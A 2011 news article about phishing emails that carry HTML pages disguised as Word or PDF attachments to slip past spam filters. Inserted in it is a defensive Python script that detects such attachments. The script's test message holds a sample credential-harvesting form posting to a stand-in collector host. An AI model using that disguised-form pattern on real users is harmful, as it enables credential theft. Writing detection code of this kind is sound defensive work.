Phishing Scheme Targets PayPal, BofA

Low-Tech Scam Uses Attachments to Fool Spam Filters

By , March 22, 2011.

The United States Computer Emergency Readiness Team, part of the Department of Homeland Security, has issued a notice about ongoing phishing attacks targeting PayPal, Bank of America, Lloyds and TSB users.

The attacks get past spam filters using HTML webpage attachments, rather than traditional phishing e-mails that contain malicious links. "Many browsers utilize anti-phishing filters to help protect users against phishing attacks," US-CERT states. "This method of attack is able to bypass this security mechanism."

US-CERT encourages users and administrators to:

  • Not follow unsolicited links or attachments in e-mail;
  • Use caution when providing personal information online;
  • Verify the legitimacy of e-mail by contacting the sender directly;
  • Review common best practices for avoiding e-mail scams and socially engineered attacks.

Neil Schwartzman, founder and chief security specialist at Montreal-based CASL Consulting, says this mode of so-called attachment attack has been growing and has hit several large organizations, including FedEx and Canada Post, in the last month. "It's not even a sophisticated scheme," Schwartzman says. "It's almost unsophisticated, but it's clever."

Because the phishy HTML pages are e-mailed to unsuspecting recipients as attachments, spam filters have no overt URLs to scan and trap. "You create an HTML page and mail it as an attachment that's called a Word doc or a PDF, to trick the content filters," he says. "It's a way to circumvent the spam filter. The victim gets the e-mail, opens the attachment and then is sent to a legitimate website, before being routed to a site that's not legit, where, of course, the victim is asked to enter some kind of account information" or personal identifier, like a U.S. Social Security number.
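A defensive check for the technique described above, added here as an example (it is not code from US-CERT or from the article): it decodes each attachment and flags any whose bytes are HTML despite a document filename or MIME type, and lists the form targets that a filter scanning only the message body for URLs would not have seen. The function names, the sample message and the `collector.example.invalid` host are constructed for illustration.

```python
import re
from email import message_from_bytes, policy
from email.message import EmailMessage

# HTML is recognised from the decoded bytes, never from the declared name or type.
HTML_MARKERS = re.compile(rb"<\s*(!doctype\s+html|html|form|script)\b", re.I)
FORM_ACTION = re.compile(
    rb"<\s*form\b[^>]*\baction\s*=\s*[\"']?(https?://[^\"'\s>]+)", re.I)

def scan_attachments(raw_message: bytes) -> list:
    """Return one finding per attachment whose content is actually HTML."""
    msg = message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""  # undo base64/QP first
        if not HTML_MARKERS.search(payload[:4096]):
            continue
        name = part.get_filename() or ""
        declared = part.get_content_type()
        findings.append({
            "filename": name,
            "declared_type": declared,
            # HTML behind a document name or type is the disguise described above.
            "disguised": declared != "text/html"
                         or not name.lower().endswith((".html", ".htm")),
            # Remote form targets are URLs a link-only filter never saw.
            "form_targets": [u.decode("ascii", "replace")
                             for u in FORM_ACTION.findall(payload)],
        })
    return findings

def build_sample() -> bytes:
    """Constructed test message: an HTML form named as a .doc, plus a plain PDF stub."""
    msg = EmailMessage()
    msg["From"] = "billing@example.com"
    msg["To"] = "user@example.org"
    msg["Subject"] = "Account statement"
    msg.set_content("Please review the attached statement.")
    html = (b"<html><body><form method='post' "
            b"action='http://collector.example.invalid/submit'>"
            b"<input name='account'></form></body></html>")
    msg.add_attachment(html, maintype="application", subtype="msword",
                       filename="statement.doc")
    msg.add_attachment(b"%PDF-1.4\n%%EOF\n", maintype="application",
                       subtype="pdf", filename="terms.pdf")
    return msg.as_bytes()

if __name__ == "__main__":
    for finding in scan_attachments(build_sample()):
        print(finding)
```

Because the check runs on the decoded payload, base64 transfer encoding and a misleading extension do not hide the HTML from it.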

"Obviously, PayPal is worried about the theft of actual PayPal credentials," Schwartzman says. But the way these phishy forms are set up, fraudsters are out to bilk what they can out of any company or consumer. "They're phishing for any kind of information that can lead to money, whether it is a Social Security number, a PayPal account or credit card information."

Follow Tracy Kitten on Twitter: @FraudBlogger
